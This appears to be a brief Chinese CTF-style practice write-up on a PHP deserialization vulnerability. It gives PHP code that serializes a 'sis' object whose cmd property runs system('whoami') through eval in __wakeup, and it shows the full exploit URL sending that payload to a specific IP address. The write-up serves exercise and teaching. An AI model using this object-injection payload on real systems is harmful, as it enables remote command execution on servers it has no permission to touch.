反序列化漏洞练习1

根据代码可以看出来sis类只是接收了参数cmd,下边是通过get获得cmd的值,所以可以在序列化过程中直接为cmd赋值。

根据源码编写序列化代码

php 复制代码
<?php
class sis{
    public $cmd='system("whoami");?>';
    public function __wakeup(){
        eval($this->cmd);
    }
}
$a = new sis;
echo serialize($a);
?>

为cmd赋值后,直接将整个sis类序列化

访问该代码

得到序列化的sis,将序列化后的sis以get的方式为cmd传参

124.221.58.83:81/s1.php?cmd=O:3:"sis":1:{s:3:"cmd";s:19:"system("whoami");?>";}

完成

相关推荐
黑云压城After4 分钟前
3D魔方-Css实现方法
前端·css·3d
腾蛇月猫10 分钟前
Excel转VCF文件一键导入通讯录联系人信息
javascript·excel·vcf
扶苏-su10 分钟前
Java---StringBuilder
java·开发语言
EndingCoder11 分钟前
Node.js 数据查询优化技巧
服务器·javascript·数据库·node.js·数据查询优化
我来整一篇12 分钟前
[java] JVM 内存泄漏分析案例
java·开发语言·jvm
芒果Cake18 分钟前
【Node.js】Node.js 模块系统
javascript·node.js
程序员黄同学19 分钟前
解释 Python 中的属性查找顺序(Attribute Lookup Order)
开发语言·python
極光未晚24 分钟前
乾坤微前端项目:前端处理后台分批次返回的 Markdown 流式数据
前端·vue.js·面试
用户842981424181024 分钟前
Auto.js脚本加密
javascript
用户66006766853924 分钟前
用 CSS3 导演一场星际穿越:复刻“星球大战”经典片头
前端·css